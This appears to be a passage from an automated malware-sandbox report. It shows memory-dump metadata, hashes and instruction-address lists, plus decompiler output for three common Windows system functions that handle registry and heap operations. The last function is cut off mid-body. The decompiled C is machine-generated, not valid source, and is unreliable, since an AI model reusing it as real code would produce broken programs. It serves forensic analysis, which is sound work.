0x04ac878d
0x04ac8763
0x04ac8763
0x04ac8766
0x00000000
0x04ac8766
0x04b19b70
0x00000000
0x04b19b70
0x04ac8656
0x04ac865a
0x04ac865c
0x04ac8752
0x04ac8756
0x00000000
0x00000000
0x04ac875e
0x00000000
0x04ac875e
0x04ac8662
0x04ac8662
0x04ac8662
0x04ac8666
0x00000000
0x04ac8666
0x04ac85b7
0x04ac85b9
0x04ac85bc
0x04ac85bf
0x04ac85cc
0x04ac85d1
0x04ac85d4
0x04ac85db
0x04ac85de
0x04ac85e0
0x04b19b5f
0x00000000
0x04b19b5f
0x04ac85e6
0x04ac85ea
0x04ac86c3
0x04ac86c5
0x04ac86c8
0x04ac86ca
0x04b19b16
0x00000000
0x04b19b16
0x04ac86d6
0x04ac85f6
0x04ac85f6
0x04ac85f9
0x04ac8602
0x04ac8606
0x04ac860a
0x04ac860b
0x04ac860e
0x04ac8611
0x00000000
0x04ac8611
0x04ac85f3
0x00000000
0x04ac85f3
0x04ac8619
0x04ac861e
0x04ac861e
0x04ac8621
0x04ac8622
0x04ac8623
0x04ac8625
0x04ac862c
0x00000000
0x04ac873d
0x00000000
0x04ac873d
0x04ac8737
0x04ac850f
0x04ac8512
0x00000000
0x04ac8512
0x00000000
0x04ac84d6

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb60fb7324f513caf7ca83a7941a85c31c62d2f8f13b97f0da0d2896df7621a3
Instruction ID: 724096f0ac7cf609ddc3c881e670b73c878cf3401521eaa1f058dd181de483d6
Opcode Fuzzy Hash: fb60fb7324f513caf7ca83a7941a85c31c62d2f8f13b97f0da0d2896df7621a3
Instruction Fuzzy Hash: 7EB16DB4E00249DFDB14EFA9C990AAEBBB5FF48304F10452EE416AB255EB74BC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04AE513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04AE513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4bad360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E04AFD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04AD2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04AD4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E04AFF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E04ACFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x4bab1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E04AFB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x04ae5142
0x04ae514c
0x04ae5150
0x04ae5157
0x04ae5159
0x04ae515e
0x04ae5165
0x04ae5169
0x04ae516c
0x04ae5172
0x04ae5176
0x04ae517a
0x04ae517a
0x04ae517a
0x04ae517f
0x04b26d8b
0x04b26d8e
0x04b26d91
0x04b26d95
0x04b26d98
0x04b26d9c
0x04b26da0
0x04b26da3
0x04b26da7
0x04b26e26
0x04b26e26
0x04b26e2a
0x04ae51f9
0x04ae51f9
0x04ae51fe
0x04b26e33
0x04b26e33
0x04b26e39
0x04b26e3d
0x04b26e46
0x04b26e50
0x00000000
0x00000000
0x04b26e52
0x04b26e53
0x04b26e56
0x04b26e5d
0x00000000
0x00000000
0x00000000
0x04b26e5f
0x04b26e67
0x04b26e77
0x04b26e7f
0x04b26e80
0x04b26e88
0x04b26e90
0x04b26e9f
0x04b26ea5
0x04b26ea9
0x04b26eb1
0x04b26ebf
0x00000000
0x00000000
0x04b26ecf
0x04b26ed3
0x00000000
0x00000000
0x04b26edb
0x04b26ede
0x04b26ee1
0x04b26ee8
0x04b26eeb
0x04b26eed
0x04b26ef0
0x04b26ef4
0x04b26ef8
0x04b26efc
0x00000000
0x00000000
0x04b26f0d
0x04b26f11
0x04b26f32
0x04b26f37
0x04b26f3b
0x04b26f3e
0x04b26f41
0x04b26f46
0x00000000
0x00000000
0x04b26f4c
0x04b26f50
0x04b26f50
0x04b26f54
0x04b26f62
0x04b26f65
0x04b26f6d
0x04b26f7b
0x04b26f7b
0x04b26f93
0x04b26f98
0x04b26fa0
0x04b26fa6
0x04b26fb3
0x04b26fb6
0x04b26fbf
0x04b26fc1
0x04b26fd5
0x04b26fda
0x04b26fda
0x04b26fdd
0x04b26fe2
0x04b26fe7
0x04b26feb
0x04b26fef
0x04b26ff3
0x04ae520c
0x04ae520c
0x04ae520f
0x04ae5215
0x04ae5234
0x04ae523a
0x04ae523a
0x04ae5244
0x04ae5245
0x04ae5246
0x04ae5251
0x04ae5251
0x04b26f13
0x04b26f17
0x04b26f17
0x04b26f18
0x04b26f1b
0x04b26f1f
0x04b26f23
0x00000000
0x04b26f28
0x04ae5204
0x04ae5204
0x04ae5208
0x00000000
0x04ae5208
0x04ae5185
0x04ae5188
0x04ae518a
0x04ae518e
0x04ae5195
0x04b26db1
0x04b26db5
0x04b26db9
0x04ae519b
0x04ae519b
0x04ae519e
0x04ae51a7
0x04ae51a9
0x04ae51a9
0x04ae51b5
0x04ae51b8
0x04ae51bb
0x04ae51be
0x04ae51c1
0x04ae51c5
0x04ae51c9
0x04ae51cd
0x04ae51cd
0x04ae51d8
0x04ae51dc
0x04ae51e0
0x04b26dcc
0x04b26dd0
0x04b26dd5
0x04b26ddd
0x04b26de1
0x04b26de1
0x04b26de5
0x04b26deb
0x04b26df1
0x04b26df7
0x04b26dfd
0x04b26e01
0x04b26e05
0x04b26e09
0x04b26e0d
0x04b26e11
0x04b26e11
0x04ae51eb
0x04b26e1a
0x04b26e1f
0x04b26e21
0x04b26e23
0x00000000
0x04ae51f1
0x04ae51f1
0x00000000
0x04ae51f1

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 060e052363d4d8ddc791c8a779366e59e6cc44055c3abb0642e0f0588f9c23cc
Instruction ID: d7c363fb71653e632b0f6806211d52c5ef7e243dec20ff49651e0528aab434c2
Opcode Fuzzy Hash: 060e052363d4d8ddc791c8a779366e59e6cc44055c3abb0642e0f0588f9c23cc
Instruction Fuzzy Hash: 7AC100756093809FD354CF28C580A6AFBE1BF88308F144AAEF9998B352D771E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04AE03E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04AE03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x4bad360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04AE0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E04AFB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E04ACB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x4ba7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04AD7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04AD7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04B37016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04AF9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E04B369A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x4ba7c04 != 0) {
						_t118 = _v12;
						_t120 = E04B3A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x4ba7bd8;
						if( *0x4ba7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E04AF95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E04AF99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04B33540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E04ABB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E04AFAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x4ba8474 - 3;
										if( *0x4ba8474 != 3) {
											 *0x4ba79dc =  *0x4ba79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04AD7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04AD7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04B37016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x4ba8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x4ba7b00; // 0x0
							asm("ror esi, cl");
							 *0x4bab1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E04AF95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04AC7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x04ae03f1
0x04ae03f7
0x04ae03f9
0x04ae03fb
0x04ae03fd
0x04ae0400
0x04ae040a
0x04b24c7a
0x04ae0537
0x04ae0547
0x04ae0410
0x04ae0410
0x04ae0414
0x04ae0417
0x04ae041a
0x04ae0421
0x04ae0424
0x04ae042b
0x04ae043b
0x04ae043e
0x04ae043f
0x04ae043f
0x04ae0446
0x04ae0449
0x04ae044c
0x04ae044f
0x04ae0459
0x04b24c8d
0x04ae045f
0x04ae045f
0x04ae045f
0x04ae0467
0x04b24c97
0x04b24c9d
0x04b24ca4
0x04b24caa
0x04b24caf
0x04b24cb1
0x04b24cc3
0x04b24cb3
0x04b24cbc
0x04b24cbc
0x04b24cc8
0x04b24ccb
0x04b24cd7
0x04b24cda
0x04b24cdf
0x04b24cdf
0x04b24ccb
0x04b24ca4
0x04ae046d
0x04ae046f
0x04ae046f
0x04ae0471
0x04ae0476
0x04ae047a
0x04ae047b
0x04ae0483
0x04ae0489
0x04ae048d
0x00000000
0x00000000
0x04b24ce9
0x04b24cef
0x04b24d22
0x04b24d22
0x00000000
0x04b24d22
0x04b24cf1
0x04b24cf7
0x00000000
0x00000000
0x04b24cf9
0x04b24cff
0x00000000
0x00000000
0x04b24d05
0x04b24d07
0x00000000
0x00000000
0x04b24d0d
0x04b24d0f
0x04b24d14
0x04b24d16
0x00000000
0x00000000
0x04b24d1c
0x04b24d1c
0x04ae0499
0x04ae0535
0x04ae0535
0x00000000
0x04ae0535
0x04ae04a6
0x04b24d2c
0x04b24d37
0x04b24d39
0x04b24d3b
0x00000000
0x00000000
0x04b24d41
0x04b24d48
0x04ae0527
0x04ae052b
0x04ae052d
0x04ae0530
0x04ae0530
0x00000000
0x04ae052b
0x04b24d4e
0x04ae04ac
0x04ae04ac
0x04ae04af
0x04ae04b2
0x04ae04b7
0x04ae04b9
0x04ae04bb
0x04ae04bd
0x04ae04bf
0x04ae04c5
0x04ae04c9
0x04b24d53
0x04b24d59
0x04b24db9
0x04b24dba
0x04b24dbf
0x04b24dc2
0x04b24dc4
0x04b24dc7
0x04b24dce
0x00000000
0x04b24dce
0x04b24d5b
0x04b24d61
0x00000000
0x00000000
0x04b24d63
0x04b24d69
0x00000000
0x00000000
0x04b24d6b
0x04b24d6e
0x04b24d74
0x04b24d76
0x04b24d7c
0x04b24d7e
0x04b24d84
0x04b24d89
0x04b24d8c
0x04b24d8d
0x04b24d92
0x04b24d95
0x04b24d96
0x04b24d98
0x04b24d9a
0x04b24d9f
0x04b24da4
0x04b24da6
0x04b24da8
0x04b24daf
0x04b24db1
0x04b24db1
0x04b24daf
0x04b24da6
0x04b24d84
0x04b24d7c
0x00000000
0x04b24d74
0x04ae04d6
0x04b24de1
0x04ae04dc
0x04ae04dc
0x04ae04dc
0x04ae04e4
0x04b24deb
0x04b24df1
0x04b24df8
0x04b24dfe
0x04b24e03
0x04b24e05
0x04b24e17
0x04b24e07
0x04b24e10
0x04b24e10
0x04b24e1c
0x04b24e1f
0x04b24e35
0x04b24e35
0x04b24e1f
0x04b24df8
0x04ae04f1
0x04ae04fa
0x04b24e3f
0x04b24e47
0x04b24e5b
0x04b24e61
0x04b24e67
0x04b24e69
0x04b24e71
0x04b24e73
0x04ae0500
0x04ae0500
0x04ae0500
0x04ae04fa
0x04ae0508
0x04ae051d
0x04ae051d
0x04ae051f
0x04ae0524
0x00000000
0x04ae0524
0x04ae0515
0x04ae0517
0x04b24e7a
0x04b24e7c
0x00000000
0x00000000
0x04b24e85
0x00000000
0x04b24e85
0x00000000
0x04ae0517

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce88cf66bea450c7c5c8b3ac57b9abe51be9a1af7ca00dd8f913707aafaf02bb
Instruction ID: 3984a6fbc5ab7d8d051c475062d06f8d456dd489819a47a099bf90ba1b13a21f
Opcode Fuzzy Hash: ce88cf66bea450c7c5c8b3ac57b9abe51be9a1af7ca00dd8f913707aafaf02bb
Instruction Fuzzy Hash: F2915B31F04234AFEB319B69CA44BBE77B4EB05714F0502A5E925AB6D1E7B4BC00C791

Uniqueness

Uniqueness Score: -1.00%

Function 04ABC600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04ABC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x4bad360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04AC6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E04AFB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4ba7b9c; // 0x0
					_t74 = L04AD4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04AF9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L04AD77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E04AFF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E04AF13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
